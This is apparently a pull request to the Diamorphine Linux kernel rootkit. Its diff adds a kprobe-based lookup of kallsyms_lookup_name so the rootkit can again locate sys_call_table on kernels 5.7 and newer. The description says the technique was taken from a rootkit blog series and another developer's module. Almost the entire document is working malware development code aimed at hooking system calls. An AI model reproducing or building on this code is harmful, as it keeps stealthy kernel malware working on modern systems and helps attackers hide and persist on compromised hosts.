### PR TITLE
Fix 5.7+ kallsyms_lookup_name #26

### DIFF
--- a/diamorphine.c
+++ b/diamorphine.c
@@ -62,6 +62,13 @@ get_syscall_table_bf(void)
 	unsigned long *syscall_table;
 	
 #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 4, 0)
+#ifdef KPROBE_LOOKUP
+	typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
+	kallsyms_lookup_name_t kallsyms_lookup_name;
+	register_kprobe(&kp);
+	kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
+	unregister_kprobe(&kp);
+#endif
 	syscall_table = (unsigned long*)kallsyms_lookup_name("sys_call_table");
 	return syscall_table;
 #else

--- a/diamorphine.h
+++ b/diamorphine.h
@@ -21,3 +21,11 @@ enum {
 #define IS_ENABLED(option) \
 (defined(__enabled_ ## option) || defined(__enabled_ ## option ## _MODULE))
 #endif
+
+#if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0)
+#define KPROBE_LOOKUP 1
+#include <linux/kprobes.h>
+static struct kprobe kp = {
+	    .symbol_name = "kallsyms_lookup_name"
+};
+#endif


### PR DESCRIPTION
This is heavly based(ripped) from https://xcellerator.github.io/posts/linux_rootkits_11/
which is based on the original work by zizzu0 https://github.com/zizzu0/LinuxKernelModules/blob/main/FindKallsymsLookupName.c